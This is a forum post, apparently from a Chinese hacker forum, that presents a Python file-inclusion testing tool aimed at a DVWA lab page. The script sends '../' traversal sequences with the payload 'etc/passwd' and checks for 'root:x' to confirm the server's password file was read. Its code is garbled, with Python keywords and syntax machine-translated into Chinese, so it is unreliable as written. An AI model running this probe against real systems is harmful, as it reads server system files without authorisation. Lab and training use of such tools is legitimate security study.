• Welcome to the world's largest Chinese hacker forum

    Welcome to the world's largest Chinese hacker forum, our forum registration is open! You can now register for technical communication with us, this is a free and open to the world of the BBS, we founded the purpose for the study of network security, please don't release business of black/grey, or on the BBS posts, to seek help hacker if violations, we will permanently frozen your IP and account, thank you for your cooperation. Hacker attack and defense cracking or network Security

    business please click here: Creation Security  From CNHACKTEAM

Recommended Posts

导入请求

导入系统

导入术语颜色

'''

以实战教程网站应用为目标进行测试,选择其含有文件包含漏洞的页面

目标网址: http://192。168 .140 .137/dvwa/vulnerabilities/fi/?页面=

'''

定义横幅():

横幅=' ' '

******************************************************************

******************************************************************

黄志刚1.0版文件包含测试工具

******************************************************************

******************************************************************

警告:你的目标网址应该像http://example.com/index.php?文件=

'''

打印(横幅)

定义主():

横幅()

target_url=input('输入要测试的目标test :’)

有效负载='etc/passwd '

cookies={

PHPSESSID ' : ' da 096185 e 02 E1 ee 5b 6 EDF 69 FDC 83c 855 ',

安全性' : '低'

}

检测标志=假

打印(' \n测试结果: \ n \ n’)

尝试:

对于(1,10):范围内的我

' url=target_url './'*i有效载荷

#打印(网址)

response=requests.get(url=url,cookies=cookies).文本

#打印(响应)

如果响应:中的" root:x "

打印(url,' \n ')

打印(术语颜色。彩色(' \ t包含发现的漏洞的文件!','蓝色'))

检测标志=真

破裂

除了键盘中断:

打印("退出程序")

sys.exit()

如果检测标志==假:

打印('未发现文件包含漏洞!')

if __name__=='__main__':

主()

Link to comment
Share on other sites